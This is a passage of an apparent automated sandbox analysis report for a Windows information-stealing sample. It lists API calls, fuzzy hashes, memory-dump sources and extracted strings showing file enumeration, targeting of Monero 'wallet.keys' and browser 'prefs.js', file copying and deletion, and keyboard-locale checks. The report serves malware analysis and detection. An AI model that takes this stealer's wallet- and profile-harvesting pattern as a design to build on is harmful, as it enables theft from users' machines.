                                • Opcode Fuzzy Hash: a023ae1475e9592de8dba3c5969a57660c59baa50cdfabe4570b833df23ef76e
                                • Instruction Fuzzy Hash: 695120B25402189BCB24EBF4DC99FE97778FB68700F404588A60DD6190EB75DA85CFA2
                                APIs
                                • wsprintfA.USER32 ref: 008C3EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 008C3EDA
                                • StrCmpCA.SHLWAPI(?,008D0FAC), ref: 008C3F08
                                • StrCmpCA.SHLWAPI(?,008D0FB0), ref: 008C3F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008C406C
                                • FindClose.KERNEL32(000000FF), ref: 008C4081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: {$%s\%s$0{
                                • API String ID: 180737720-4204578840
                                • Opcode ID: 640361e6f53700d4a2a33454d539a75eefcbe69dcd24d9d80dc4b72e8dc6a07f
                                • Instruction ID: 9680352416afbccf81771430480b1b3e0671306f3e0dcea994d390bdb1422ca0
                                • Opcode Fuzzy Hash: 640361e6f53700d4a2a33454d539a75eefcbe69dcd24d9d80dc4b72e8dc6a07f
                                • Instruction Fuzzy Hash: CA5110B1900218ABCB24EBE4DC85FEA7378FB58740F40858DB659D6140DA75EB8ACF91
                                APIs
                                • wsprintfA.USER32 ref: 008BED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 008BED55
                                • StrCmpCA.SHLWAPI(?,008D1538), ref: 008BEDAB
                                • StrCmpCA.SHLWAPI(?,008D153C), ref: 008BEDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008BF2AE
                                • FindClose.KERNEL32(000000FF), ref: 008BF2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: 09b577621e0b32f6fa084b632b0d4d677f446fc3daa9c2605d68f8bce0c53e96
                                • Instruction ID: 3c501381638f9be576f676aa563df85d478874b0a03d5e479842e3648177a846
                                • Opcode Fuzzy Hash: 09b577621e0b32f6fa084b632b0d4d677f446fc3daa9c2605d68f8bce0c53e96
                                • Instruction Fuzzy Hash: 80E1A97191111C9ADB58EB64DC96FEE7338FF54304F4041A9B50AE2192EE34AF8ACE52
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: b_{$ rk?$"vu$3@Sv$6wo|$IA_$Wj|>$awm$tzm}$=Ww$`9_$twU
                                • API String ID: 0-3776382672
                                • Opcode ID: 984ed4194b3efa7f7605a828df479412178a8ef01417745ec7eda34fd24d402d
                                • Instruction ID: 97b622398f2a0b623dc5cb5112c90656699dec15d0c40c71696815c501ead831
                                • Opcode Fuzzy Hash: 984ed4194b3efa7f7605a828df479412178a8ef01417745ec7eda34fd24d402d
                                • Instruction Fuzzy Hash: D6B21AF3A0C2009FE7046E2DEC8567ABBE5EFD4220F1A853DE9C4D7744E63598058697
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008D15B8,008D0D96), ref: 008BF71E
                                • StrCmpCA.SHLWAPI(?,008D15BC), ref: 008BF76F
                                • StrCmpCA.SHLWAPI(?,008D15C0), ref: 008BF785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008BFAB1
                                • FindClose.KERNEL32(000000FF), ref: 008BFAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: 3a536852fc31abfee61d8d8b2ac2cf8c66159aac0ff8adb471382ab10864354a
                                • Instruction ID: 4e685b52eec346a5364527fe79dbaf8d38c3ff2fe7b8aef4445e6d81ea97b9e7
                                • Opcode Fuzzy Hash: 3a536852fc31abfee61d8d8b2ac2cf8c66159aac0ff8adb471382ab10864354a
                                • Instruction Fuzzy Hash: F3B111719001189BDB28EB64DC96FED7379FF54304F4085ADA50AD6292EF30AB49CB93
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008D510C,?,?,?,008D51B4,?,?,00000000,?,00000000), ref: 008B1923
                                • StrCmpCA.SHLWAPI(?,008D525C), ref: 008B1973
                                • StrCmpCA.SHLWAPI(?,008D5304), ref: 008B1989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008B1D40
                                • DeleteFileA.KERNEL32(00000000), ref: 008B1DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008B1E20
                                • FindClose.KERNEL32(000000FF), ref: 008B1E32
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: 7fcddb9455ed95249b6db4baaf0a30afce39152392d91b59167760bdab627206
                                • Instruction ID: 4b56cc95dc90fc17b6a517d7b4d481c8e7c93b3f54b3dc830b84c4734de3fa50
                                • Opcode Fuzzy Hash: 7fcddb9455ed95249b6db4baaf0a30afce39152392d91b59167760bdab627206
                                • Instruction Fuzzy Hash: 3C12E97191011C9BCB19EB64DC96FEE7378FB54304F4041ADA51AE6191EF30AF89CBA2
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,008D0C2E), ref: 008BDE5E
                                • StrCmpCA.SHLWAPI(?,008D14C8), ref: 008BDEAE
                                • StrCmpCA.SHLWAPI(?,008D14CC), ref: 008BDEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008BE3E0
                                • FindClose.KERNEL32(000000FF), ref: 008BE3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: 531abac5f152e28d1672d6fbc72ec997c2a2485f9632090e6b53f15d1b0e3b01
                                • Instruction ID: c8979fb2fe4f829a213ed16be274eaae8c4fedaa985aa3434ebb749db4e5ec5d
                                • Opcode Fuzzy Hash: 531abac5f152e28d1672d6fbc72ec997c2a2485f9632090e6b53f15d1b0e3b01
                                • Instruction Fuzzy Hash: 09F18E7181011C9BDB29EB64DC96FEE7338FF54304F4041ADA41AA2191EF34AF8ACE56
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008D14B0,008D0C2A), ref: 008BDAEB
                                • StrCmpCA.SHLWAPI(?,008D14B4), ref: 008BDB33
                                • StrCmpCA.SHLWAPI(?,008D14B8), ref: 008BDB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008BDDCC
                                • FindClose.KERNEL32(000000FF), ref: 008BDDDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: 1ecc9bed3ce6939093ce1505bd53df1e103c63e70c6832ada570b53de69bcce7
                                • Instruction ID: faf363dec4ba38ab3fb6155153964902fd142a977a9333f573fc326a72853c8c
                                • Opcode Fuzzy Hash: 1ecc9bed3ce6939093ce1505bd53df1e103c63e70c6832ada570b53de69bcce7
                                • Instruction Fuzzy Hash: DA910572900108A7CB18FBB4EC96EED777DFB94304F408668A95AD6141EE34DB09CB93
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,008D05AF), ref: 008C7BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 008C7BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 008C7C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 008C7C62
                                • LocalFree.KERNEL32(00000000), ref: 008C7D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: af0b9d060819c96f49ccfc0bbe3bb68f143ae4bde6af10f77e6664c682763e3c
                                • Instruction ID: 7a5bf86d955b3743d7fdc80259ffce8931edb5c888d0bfe15636545bd5f4f058
                                • Opcode Fuzzy Hash: af0b9d060819c96f49ccfc0bbe3bb68f143ae4bde6af10f77e6664c682763e3c
                                • Instruction Fuzzy Hash: 25415D7194021CABCB24DB94DC99FEEB774FF54704F204199E50AA2280DB74AF85CFA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 'lo_$>-yo$B}o_$F|W}$k5u}$s{vk$w6`"
                                • API String ID: 0-49416624
                                • Opcode ID: 888e63cff54631441ad0658b443d64ee998da0919c9fb1ffe7169135d402c7b4
                                • Instruction ID: 3f8bb8c362145951a82c9ec94223e2557b808402c3472190287de4cc1661c441
                                • Opcode Fuzzy Hash: 888e63cff54631441ad0658b443d64ee998da0919c9fb1ffe7169135d402c7b4
                                • Instruction Fuzzy Hash: 9BB2F5F39082049FE3046F2DEC8566ABBE9EF94720F1A493DEAC4C7744E63598058797
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,008D0D73), ref: 008BE4A2
                                • StrCmpCA.SHLWAPI(?,008D14F8), ref: 008BE4F2
                                • StrCmpCA.SHLWAPI(?,008D14FC), ref: 008BE508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 008BEBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
